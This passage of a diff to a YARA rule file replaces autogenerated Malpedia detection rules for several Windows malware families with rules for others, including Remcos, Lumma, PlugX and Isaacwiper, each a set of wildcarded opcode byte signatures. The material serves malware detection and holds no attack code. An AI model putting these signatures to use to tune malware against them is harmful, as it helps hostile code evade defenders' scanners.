"TLP:WHITE" strings: - $sequence_0 = { 6a00 e8???????? 85c0 7407 83f802 } - $sequence_1 = { f3ab 66ab aa 5f 85f6 } - $sequence_2 = { ff15???????? 6808400000 6a40 ff15???????? } - $sequence_3 = { 56 57 683c400000 6a40 } - $sequence_4 = { e8???????? 6800400000 6a00 ff15???????? } - $sequence_5 = { c701???????? 8b497c 85c9 7407 51 } - $sequence_6 = { 8a08 80f920 7505 83c021 eb05 } - $sequence_7 = { 68???????? 56 ff15???????? 68???????? 56 a3???????? e8???????? } - $sequence_8 = { 56 50 8d45fc 6a04 50 } - $sequence_9 = { 7412 68???????? 50 e8???????? 59 a3???????? 59 } - $sequence_10 = { 3c70 7f04 0409 eb06 } - $sequence_11 = { 3c69 7c08 3c70 7f04 } - $sequence_12 = { 488b05???????? 4833c4 48898424d0030000 33c0 488be9 } - $sequence_13 = { c3 56 53 6a01 57 e8???????? } - $sequence_14 = { 56 6a00 ff15???????? 8bf8 85ff 7504 5f } - $sequence_15 = { 8bc6 5f 5e c3 33c0 6a00 } - $sequence_16 = { 33c0 ebac 498bcc ff15???????? 488d4d70 } - $sequence_17 = { ff15???????? 85f6 7404 85c0 } - $sequence_18 = { 57 e8???????? 56 e8???????? 83c414 b801000000 } - $sequence_19 = { 68???????? 56 e8???????? 56 e8???????? 83c438 } - $sequence_20 = { 0f84df010000 8b542444 488bcf 442bea 4585ed } - $sequence_21 = { ff15???????? 85c0 0f84e7010000 488d558c 488d8dd0020000 ff15???????? } - $sequence_22 = { c3 33c0 ebf8 53 33db 391d???????? 56 } - $sequence_23 = { a3???????? 5e c3 68???????? ff15???????? 85c0 } - $sequence_24 = { e8???????? 85c0 7429 488d542468 4c8bce 41b804000000 488bcf } - $sequence_25 = { 83fb01 7524 488d942490010000 4d8bc4 488bcd } - $sequence_26 = { 8b86d8974400 85c0 740e 50 e8???????? } - $sequence_27 = { 83e03f 6bc830 8b0495d8974400 f644082801 7421 57 e8???????? } - $sequence_28 = { c1fa06 8bc6 83e03f 6bc830 8b0495d8974400 885c0128 8b0495d8974400 } - $sequence_29 = { 81ec54080000 56 57 33f6 b9ff010000 33c0 8dbdaef7ffff } - $sequence_30 = { f3ab 8bca 83e103 f3aa 8b4df8 } - $sequence_31 = { 57 50 ff5114 85c0 0f8c8c000000 } - $sequence_32 = { ffd6 6a00 6a00 8d8424140c0000 6a00 } - $sequence_33 = { 58 7577 ff7508 8b7d08 } + $sequence_0 = { 50 e8???????? 83c408 8b0d???????? 6a64 51 ff15???????? } + $sequence_1 = { 99 2bc2 6a00 8bd1 d1ea d1f8 } + $sequence_2 = { 8b5120 56 50 ffd2 85c0 7807 c745ec01000000 } + $sequence_3 = { 0f8418010000 8b08 8d55fc 52 50 8b4120 } + $sequence_4 = { 0fb7047521664000 4e 6685c0 75ec 57 68???????? ffd3 } + $sequence_5 = { 50 ff15???????? 83c410 6a01 53 } + $sequence_6 = { 57 ff15???????? 8d70ff 0fb70477 6685c0 7413 8bff } + $sequence_7 = { 90 68???????? 33f6 ff15???????? a1???????? 85c0 7429 } + $sequence_8 = { 8b45f0 3bc6 0f8418010000 8b08 8d55fc 52 50 } + $sequence_9 = { 52 8d8574fdffff 68???????? 50 ff15???????? 83c410 6a01 } condition: - 7 of them and filesize <74309632 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Crat_Auto : FILE +rule MALPEDIA_Win_Isaacwiper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5ca84b15-9c50-5146-aeb0-8e43c37e0140" + id = "1329030c-897c-5c01-8c07-662be913ab23" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crat_auto.yar#L1-L175" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.isaacwiper_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "a19b8917ee2e01478bdd8090b22583a65c2cc48e63af4151406da25e5b4c7a8a" + logic_hash = "ed4c1277cdfb0687c916d7f4c8800e6899b857de5108f3daf478ca99ea587637" score = 75 quality = 75 tags = "FILE" @@ -183471,39 +186256,32 @@ rule MALPEDIA_Win_Crat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 488bd0 488d8d90010000 e8???????? 90 } - $sequence_1 = { e8???????? 488bd0 488d8d88000000 e8???????? 90 } - $sequence_2 = { 7406 e8???????? 90 488b542420 4883c2e8 } - $sequence_3 = { e8???????? 488bc8 4885c0 7433 } - $sequence_4 = { e8???????? 488bd0 488d8da8010000 e8???????? 90 } - $sequence_5 = { 48f7c20000ffff 7523 0fb7fa 8bcf e8???????? 4885c0 7427 } - $sequence_6 = { e8???????? 488bd0 488d4d58 e8???????? 90 } - $sequence_7 = { ebd0 498bc4 48833d????????10 480f4305???????? 482bc8 } - $sequence_8 = { 33d2 c1e902 f7f1 eb02 } - $sequence_9 = { ffd0 85c0 750f ff15???????? } - $sequence_10 = { 8bcb e8???????? 8b55d8 8b4b0c } - $sequence_11 = { 8bcb e8???????? 8b4b0c 8d4101 } - $sequence_12 = { 8b4004 8bca 3bc2 0f47c8 51 8b4d10 e8???????? } - $sequence_13 = { 8b4b0c 8d4101 89430c c60100 8b4dd4 41 } - $sequence_14 = { 8b4324 668948fe c740f800000000 c740f400000000 c740f000000000 5f 5e } - $sequence_15 = { 8b5508 0f57c0 56 8b750c b896000000 f30f7f01 } - $sequence_16 = { 8b4b0c 8d4101 89430c 8a45d3 8801 8b4dd4 41 } + $sequence_0 = { 771b 52 51 e8???????? 83c408 5f c706???????? } + $sequence_1 = { b804000000 33d2 395138 0f45c2 0b410c 0bc3 50 } + $sequence_2 = { 8d0471 3bc8 7319 8d46ff } + $sequence_3 = { 5b 8be5 5d c3 6a34 e8???????? 8bf0 } + $sequence_4 = { 7576 eb56 8b0485d89e0210 6800080000 6a00 50 8945fc } + $sequence_5 = { 744a 83c118 57 8b7d14 894d08 0f1f4000 } + $sequence_6 = { 81ecc8090000 56 57 8bf1 c745f800000000 ff15???????? 898538f6ffff } + $sequence_7 = { 6685f6 743e 6a00 8bd6 8bcf e8???????? 8ad0 } + $sequence_8 = { 85db 0f8454010000 8bc6 83e001 03c8 d1ee } + $sequence_9 = { 8bf8 83e03f c1ff06 6bd038 8b34bde8670310 8a441628 } condition: - 7 of them and filesize <4161536 + 7 of them and filesize <467968 } -rule MALPEDIA_Win_Artfulpie_Auto : FILE +rule MALPEDIA_Win_Lightlesscan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "76593040-a588-559b-a14b-1edef48802a1" + id = "0e07ce78-7b41-59eb-abf5-c61709c5b1e0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.artfulpie_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lightlesscan_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "61512abd96fd629a35a0b2673ca4f2027db7aa6e8bcee3bfbea21b9b36b003b2" + logic_hash = "75c6d82588f11dc73e097a77d8f1194031d887782bbdd3a0785b555591ab1fe4" score = 75 quality = 75 tags = "FILE" @@ -183517,32 +186295,32 @@ rule MALPEDIA_Win_Artfulpie_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 894ddc c745e0a8204100 e9???????? c745e0a4204100 } - $sequence_1 = { 8d1c8568524100 8b03 8b15???????? 83cfff 8bca 8bf2 } - $sequence_2 = { 23c1 83c008 5d c3 8b04c544ec4000 5d } - $sequence_3 = { 7514 8b7830 8b00 397838 740a 33d2 } - $sequence_4 = { 6a00 8d854cfcffff c745fc2a2f2a00 50 } - $sequence_5 = { 660f282d???????? 660f59f5 660f28aa101f4100 660f54e5 660f58fe 660f58fc 660f59c8 } - $sequence_6 = { e8???????? 85c0 7432 8bcb e8???????? } - $sequence_7 = { 8b5d10 8b0485984e4100 56 8b7508 57 8b4c0818 } - $sequence_8 = { 50 53 ff15???????? 85c0 7455 8b7df0 } - $sequence_9 = { 6a41 5f 894df0 8b34cdf00e4100 8b4d08 6a5a } + $sequence_0 = { e8???????? 33db 48895c2460 488b4d70 4885c9 7405 e8???????? } + $sequence_1 = { b890100000 e8???????? 482be0 48c7442458feffffff 48899c24c8100000 4889b424d0100000 4889bc24d8100000 } + $sequence_2 = { 4863d8 e8???????? 488bd3 b940000000 ffd0 488d0deaa20300 c705????????01000000 } + $sequence_3 = { 488d0d50c00100 e8???????? 4983c8ff ba80000000 488905???????? 488d0da05d0500 4885c0 } + $sequence_4 = { 4881c440020000 5b f3c3 8815???????? 0100 a9150100c7 150100d615 } + $sequence_5 = { 498bcc e8???????? 488d1564b70500 41b804000000 498bcc e8???????? 488d1567b70500 } + $sequence_6 = { 4889442420 e8???????? eb0c 4c8d0d68440100 e8???????? 488d0d8cc10100 } + $sequence_7 = { 488d0d23b40600 ffd0 48833d????????00 7415 488d0db04a0300 e8???????? 488b0d???????? } + $sequence_8 = { 7506 ff15???????? 4489bc24f8000000 488b07 418bf7 0fb74814 } + $sequence_9 = { 488d4d30 33d2 41b801100000 e8???????? 33d2 41b8faff0000 488bce } condition: - 7 of them and filesize <204800 + 7 of them and filesize <1399808 } -rule MALPEDIA_Win_Alma_Communicator_Auto : FILE +rule MALPEDIA_Win_Remcos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bb280ae5-df93-5ddd-a029-1d8f19d4cee3" + id = "0b71eaff-61b4-55ab-a8af-3cf13e03dd61" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alma_communicator_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remcos_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "ceeffab13f59872b0e8352c80061e88c0752f86bcb15a8ae0c39228603990d18" + logic_hash = "d80be2f75bdd44294476100f6767031142d9f2872cceaebec5f1ed9745e8779f" score = 75 quality = 75 tags = "FILE" @@ -183556,34 +186334,34 @@ rule MALPEDIA_Win_Alma_Communicator_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a4a1c 884807 a1???????? c6400800 e8???????? 59 } - $sequence_1 = { 8945f0 8b450c 8945f4 8b4514 40 c745ec93f84000 894df8 } - $sequence_2 = { 8bcb 898554f7ffff e8???????? 8bcb 898550f7ffff 6a02 5f } - $sequence_3 = { e8???????? 83c40c 8d8d58ffffff 8d5102 } - $sequence_4 = { 8974241c 68d0070000 832600 897c2424 } - $sequence_5 = { 668b4f02 03fe 663bca 75f5 ffb53cf7ffff 8907 6bc328 } - $sequence_6 = { 0f85aa010000 33c0 40 8985ccebffff } - $sequence_7 = { 7204 3c7a 7608 3c2b 7404 3c2f } - $sequence_8 = { 88840d20f6ffff 41 84c0 75ed 8d8d20f6ffff 49 8a4101 } - $sequence_9 = { 8a01 41 84c0 75f9 8a442454 2bca 83f901 } + $sequence_0 = { 7410 6a00 ff35???????? ff15???????? } + $sequence_1 = { 50 ff15???????? 8d45f0 33f6 } + $sequence_2 = { 6a09 ff35???????? ff15???????? ff35???????? ff15???????? } + $sequence_3 = { 8d45f8 50 ff15???????? ff7508 } + $sequence_4 = { 7508 ff15???????? 33c0 5f } + $sequence_5 = { 6a09 ff35???????? ff15???????? ff35???????? } + $sequence_6 = { ff15???????? 50 ff15???????? 8d45f0 33f6 } + $sequence_7 = { 50 6a28 ff15???????? 50 ff15???????? 8d45f0 33f6 } + $sequence_8 = { 51 51 8d45f8 c745f808000000 50 ff15???????? ff15???????? } + $sequence_9 = { 85c0 7410 6a00 ff35???????? ff15???????? } condition: - 7 of them and filesize <245760 + 7 of them and filesize <1054720 } -rule MALPEDIA_Win_Hookinjex_Auto : FILE +rule MALPEDIA_Win_Lumma_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cc81917a-8c1e-59eb-8738-a94445516bc1" + id = "00d0b80d-1d60-5a8c-ab53-b2e4e4ca8bb2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hookinjex_auto.yar#L1-L148" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lumma_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "afb96fa06c3548b099102aa92aa51777edafb1bb6fe4920aba390d45066ccc62" - score = 60 - quality = 25 + logic_hash = "5263a9e2f3da4148c4cca89d62ca2919f1c780d4176c9b4897b89aefc59def79" + score = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -183595,38 +186373,35 @@ rule MALPEDIA_Win_Hookinjex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 85c0 740c b913e40000 } - $sequence_1 = { e8???????? b964000000 ff15???????? 0fb705???????? } - $sequence_2 = { e8???????? 85c0 7507 b80e000000 } - $sequence_3 = { e9???????? 488b4c2458 e8???????? 488b4c2450 } - $sequence_4 = { e8???????? b95b730100 e8???????? e9???????? } - $sequence_5 = { e8???????? 85c0 750f b9dc550100 } - $sequence_6 = { e8???????? 833d????????00 7411 b903000000 e8???????? } - $sequence_7 = { e8???????? 85c0 7408 803b00 } - $sequence_8 = { 48817c243000100000 0f82dc020000 488b442460 4889442438 } - $sequence_9 = { 2500180000 3d00080000 750d c78424e800000001000000 eb0b } - $sequence_10 = { 25001b0000 3d00100000 750a c744244401000000 } - $sequence_11 = { 25001b0000 3d00110000 750d c784243c01000001000000 } - $sequence_12 = { 25001b0000 3d00100000 750d c784242401000001000000 } - $sequence_13 = { 2500180000 3d00180000 750a c744247c01000000 } - $sequence_14 = { 25001b0000 3d00110000 750a c744245c01000000 } - $sequence_15 = { 48817c243800100000 0f82f5000000 488b442438 4883c02f } + $sequence_0 = { 57 53 ff767c ff7678 } + $sequence_1 = { ffd0 83c40c 894648 85c0 } + $sequence_2 = { ff5130 83c410 85c0 7407 } + $sequence_3 = { ff7678 ff7644 ff563c 83c414 } + $sequence_4 = { ff770c ff37 ff7134 ff5130 } + $sequence_5 = { ff7608 ff7044 ff503c 83c414 } + $sequence_6 = { 894610 8b461c c1e002 50 } + $sequence_7 = { 833800 740a e8???????? 833822 } + $sequence_8 = { 83c40c 6a02 6804010000 e8???????? } + $sequence_9 = { 017e78 83567c00 017e68 83566c00 } + $sequence_10 = { 89e5 8b550c 6bd204 89d1 } + $sequence_11 = { 41 5d 41 5b 41 5c } + $sequence_12 = { 48 83ec28 0f05 48 83c428 49 } condition: - 7 of them and filesize <6545408 + 7 of them and filesize <1115136 } -rule MALPEDIA_Win_Rtm_Locker_Auto : FILE +rule MALPEDIA_Win_Zeroaccess_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a8f49436-bcde-542d-92ad-a9016371f8b8" + id = "dc18e525-3177-5057-b2b8-44deb0459882" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rtm_locker_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeroaccess_auto.yar#L1-L151" license_url = "N/A" - logic_hash = "61d8b5fbf492d5b9d06c2052f9a6a3111c4e3f003fd0450ca27ee699de4151fc" + logic_hash = "4423d17d4505fc4e1d7ad61f77b371f17ded461805f238fd1e8f686647ad897a" score = 75 quality = 75 tags = "FILE" @@ -183640,32 +186415,37 @@ rule MALPEDIA_Win_Rtm_Locker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8d2cfeffff e8???????? 0f108d64fcffff 33c9 0f109574fcffff 0f109d84fcffff 0f10a594fcffff } - $sequence_1 = { 0f104630 660fefd0 0f1006 660fefc8 0f110f 0f116710 0f115f20 } - $sequence_2 = { 0f29442470 0f28842470010000 0f29842420010000 0f28842480010000 89442458 83c004 894c245c } - $sequence_3 = { e8???????? 8d8d68ffffff e8???????? 0f108568ffffff be18000000 0f1185c8feffff } - $sequence_4 = { 0fbe8098074200 40 8945cc 2b45dc 8945d4 3bc2 0f8f10020000 } - $sequence_5 = { 50 6af5 eb03 50 6af6 ff15???????? 8b04bd500f4200 } - $sequence_6 = { c1f910 884e02 8b4de0 0ac1 884603 8bc1 c1f808 } - $sequence_7 = { 897dfc 897db8 894508 85c0 0f8f3ffeffff } - $sequence_8 = { 8d442430 50 ff15???????? 8bf0 83feff 7431 } - $sequence_9 = { 8b0c85500f4200 8b45f8 807c012800 7d46 } + $sequence_0 = { ff15???????? 85c0 7408 ff15???????? eb02 } + $sequence_1 = { 56 56 6a20 6a05 } + $sequence_2 = { bf03000040 eb05 bf010000c0 85ff } + $sequence_3 = { 6a01 8d45f4 50 ff7308 ff15???????? 85c0 } + $sequence_4 = { 6a04 68???????? 6a10 68???????? 68060000c8 ff7708 ff15???????? } + $sequence_5 = { ff15???????? 85c0 7407 b8e3030000 } + $sequence_6 = { 56 6a10 8945e8 8d45e4 } + $sequence_7 = { e8???????? 50 6819000200 8d45f8 } + $sequence_8 = { 3bc1 7604 83c8ff c3 } + $sequence_9 = { 50 68???????? 6889001200 8d45fc } + $sequence_10 = { 56 8d45f8 50 ff15???????? 6a01 8d45f8 50 } + $sequence_11 = { 33c0 48 83c9ff c744242804000000 48 } + $sequence_12 = { 85db 741f 8b4304 49 } + $sequence_13 = { 7615 83780815 750f c705????????01000000 } + $sequence_14 = { 48 83ec20 41 8bf9 48 8bd9 } condition: - 7 of them and filesize <598016 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_Deadwood_Auto : FILE +rule MALPEDIA_Win_Mutabaha_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5f00cc5a-9602-50e1-9261-d675303486e9" + id = "04cdad38-c730-58bf-ac9f-7881643cfe37" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deadwood_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mutabaha_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "ea97d4cccc4d6a9b5e482bbc380fcc6fbef419bedaf1f051b13240e62ed24277" + logic_hash = "21a56ac17d7181e1f264aab4aad9c0f8a40e021362f525e9ed7460f5330637ce" score = 75 quality = 75 tags = "FILE" @@ -183679,34 +186459,34 @@ rule MALPEDIA_Win_Deadwood_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 e8???????? 83c404 33db be0f000000 89b42418010000 899c2414010000 } - $sequence_1 = { 7303 8d4508 8b5518 52 50 8b4110 50 } - $sequence_2 = { 7464 8bf0 8b4814 894c2424 3bcb 7504 895c2428 } - $sequence_3 = { 6a01 8d442414 50 8d4c243c 897c247c c744241878f44500 e8???????? } - $sequence_4 = { 8bf8 85ff 0f8484000000 53 53 53 53 } - $sequence_5 = { ff15???????? 6804010000 8d8df4fdffff 51 50 ff15???????? 33d2 } - $sequence_6 = { e8???????? 8b542460 c7442440e4ba4500 bb???????? 895c2454 8b4204 c7440460c8ba4500 } - $sequence_7 = { 8b07 8b4804 837c390c00 0f94c1 884dd8 c745fc01000000 84c9 } - $sequence_8 = { 74ed 89450c 8b13 807a1d00 7404 8b3e eb13 } - $sequence_9 = { 8bb510ffffff e9???????? c3 8d8d34ffffff e9???????? 8d8d18ffffff e9???????? } + $sequence_0 = { 50 8d9518ffffff 8d8d68feffff e8???????? 8d8d48ffffff c645fc09 } + $sequence_1 = { 8b85dcfdffff 83f808 7213 40 8d8dc8fdffff 50 ffb5c8fdffff } + $sequence_2 = { c745b800000000 c645a800 c745c06cac4700 85c0 7409 50 e8???????? } + $sequence_3 = { 85d2 7424 8b7c2424 8d4f08 833900 740a 40 } + $sequence_4 = { 0fb7f8 eb43 83f803 7536 ff734c ff75d4 e8???????? } + $sequence_5 = { c745ec00000000 668945dc e8???????? 8d45dc c745fc05000000 50 8bce } + $sequence_6 = { e8???????? c7465400000000 8bc6 8b4df4 64890d00000000 59 5e } + $sequence_7 = { 8d8d84fdffff c78598fdffff07000000 c78594fdffff00000000 66898584fdffff e8???????? 57 ba???????? } + $sequence_8 = { 0103 115304 33c0 5f 5e 5b 8be5 } + $sequence_9 = { e9???????? 8d8d5cffffff e9???????? 8d4dbc e9???????? 8d4dd4 e9???????? } condition: - 7 of them and filesize <1055744 + 7 of them and filesize <1220608 } -rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE +rule MALPEDIA_Win_Plugx_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8c3065fc-d922-5a5a-97bb-f5578c899954" + id = "f3050f8b-cffb-5dba-854a-dbf0ccdc7dc1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_openssl_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.plugx_auto.yar#L1-L275" license_url = "N/A" - logic_hash = "87e8b70576343bf43fa1d91175bc18c4648aa0bc5e7b7de2b8eae5131a311e26" + logic_hash = "dee163361f083ebb03bd1347d736d4fc9d87c0c2c6fd15ac5989d8dd6f5a5f80" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -183718,32 +186498,53 @@ rule MALPEDIA_Win_Zeus_Openssl_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1e205 2bd1 8bce c7460471000000 } - $sequence_1 = { eb04 807dfd05 7607 814a1800100100 8a4dfe } - $sequence_2 = { 8b45f4 8b4850 8b45d0 23c2 894dcc 8b0481 8bc8 } - $sequence_3 = { 895df0 0fb6de 0145f8 0fb745d2 0fb6ca 03cb bf01000000 } - $sequence_4 = { 48 7526 804dff04 884a01 eb19 804dff02 884a01 } - $sequence_5 = { 894a04 83c620 83c120 81fee00f0000 } - $sequence_6 = { 83c608 03d0 895dfc 8955f8 897df0 3b75cc 72dc } - $sequence_7 = { 8b8d7cffffff 830204 5e c70101000000 33c0 5b } - $sequence_8 = { 898bc41b0000 8b5dfc 2bf1 8b7df4 8bc8 c1e908 0fb6c9 } - $sequence_9 = { d1e8 83fe1f 7eeb 6683bfb800000000 7537 6683bfbc00000000 752d } + $sequence_0 = { 51 56 57 6a1c 8bf8 } + $sequence_1 = { 33d2 f7f3 33d2 8945fc } + $sequence_2 = { 55 8bec a1???????? 83ec5c 53 } + $sequence_3 = { 55 8bec 51 0fb74612 } + $sequence_4 = { 51 53 6a00 6a00 6a02 ffd0 85c0 } + $sequence_5 = { 41 3bca 7ce0 3bca } + $sequence_6 = { 56 8b750c 8b4604 050070ffff } + $sequence_7 = { 6a00 6800100000 6800100000 68ff000000 6a00 6803000040 } + $sequence_8 = { e8???????? 3de5030000 7407 e8???????? } + $sequence_9 = { e8???????? 85c0 7508 e8???????? 8945fc } + $sequence_10 = { 50 ff15???????? a3???????? 8b4d18 } + $sequence_11 = { 85c0 7413 e8???????? 3de5030000 } + $sequence_12 = { e8???????? 85c0 7407 b84f050000 } + $sequence_13 = { e8???????? 85c0 750a e8???????? 8945fc } + $sequence_14 = { 6a00 6a04 6a00 6a01 6800000040 57 } + $sequence_15 = { 6a00 6819000200 6a00 6a00 6a00 51 } + $sequence_16 = { 56 56 6a01 56 ffd0 } + $sequence_17 = { 85c0 750d e8???????? 8945f4 } + $sequence_18 = { 57 e8???????? eb0c e8???????? } + $sequence_19 = { 50 ff75e8 6802000080 e8???????? } + $sequence_20 = { 6a00 ff7028 e8???????? 83c408 85c0 } + $sequence_21 = { 6808020000 6a00 ff742450 e8???????? 83c40c } + $sequence_22 = { 6a02 6a00 e8???????? c705????????00000000 } + $sequence_23 = { 6800080000 68???????? e8???????? 6800080000 68???????? e8???????? } + $sequence_24 = { 5e 5f 5b 5d c3 64a118000000 } + $sequence_25 = { 81ec90010000 e8???????? e8???????? e8???????? } + $sequence_26 = { 68???????? 6830750000 68e8030000 ff36 } + $sequence_27 = { 5f 5b 5d c20400 55 53 57 } + $sequence_28 = { 50 56 ffb42480000000 ff15???????? } + $sequence_29 = { 6808020000 6a00 ff74242c e8???????? } + $sequence_30 = { 6a01 6a00 e8???????? a3???????? 6800080000 } condition: - 7 of them and filesize <4546560 + 7 of them and filesize <1284096 } -rule MALPEDIA_Win_Nitol_Auto : FILE +rule MALPEDIA_Win_Tarsip_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "198cac67-df3a-5f33-8def-8dcd3146a557" + id = "4ad2adc0-f292-5e9b-b3e6-4bd61bcff987" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nitol_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tarsip_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "e9d7d8e217f108c3161acd931dc4e0ba15adf22ad1ef941917cfc7f75a6244b1" + logic_hash = "228c42e725c96bb3ed688957a36bb59d0b21035a6d52aae02eb400f7262ce8f7" score = 75 quality = 75 tags = "FILE" @@ -183757,32 +186558,32 @@ rule MALPEDIA_Win_Nitol_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945d0 885dd4 c645d506 ffd6 668945d6 } - $sequence_1 = { 50 ff15???????? 6860ea0000 8945f8 66895de8 e8???????? 59 } - $sequence_2 = { ff742430 ffd7 8d442430 55 50 53 56 } - $sequence_3 = { 7424 48 0f85c0fdffff 6a01 } - $sequence_4 = { 8b35???????? 833d????????01 7465 ffd6 6a0a 99 59 } - $sequence_5 = { 8bf8 8bcf 8b07 ff5068 85c0 8945ec 7457 } - $sequence_6 = { 7524 8d8594feffff 50 8d8514ffffff 50 8d8514faffff 68???????? } - $sequence_7 = { 7419 4a 7416 4a 7406 c6043778 eb1b } - $sequence_8 = { 53 ff15???????? e9???????? 6a40 33c0 } - $sequence_9 = { ff15???????? 53 8d8df8fcffff 6a0a } + $sequence_0 = { 8884244f840000 e8???????? 8d94240c840000 52 } + $sequence_1 = { ff15???????? 89ae14420100 8b8610420100 3bc5 } + $sequence_2 = { ff15???????? 898614420100 85c0 754f } + $sequence_3 = { 80fa2f 7505 b83f000000 8d148500000000 8b442420 c1fa02 c1e106 } + $sequence_4 = { ff15???????? 5b 33c0 5e c3 57 6a00 } + $sequence_5 = { 8b08 038ea4830000 8b54240c 8a02 8801 } + $sequence_6 = { e8???????? 50 e8???????? e8???????? 99 b980841e00 } + $sequence_7 = { e8???????? 83c404 c746180f000000 895e14 885e04 8b4c240c 64890d00000000 } + $sequence_8 = { 8b442418 0374241c 53 8d542418 52 53 53 } + $sequence_9 = { 83bc240c01000010 7210 8b9424f8000000 52 e8???????? 83c404 c784240c0100000f000000 } condition: - 7 of them and filesize <139264 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Soundbite_Auto : FILE +rule MALPEDIA_Win_Unidentified_001_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "080e0f3d-446d-56c0-ac80-bd020f7550e1" + id = "7c85316d-7785-5af3-87a9-b2590753f62d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite" - source_url = 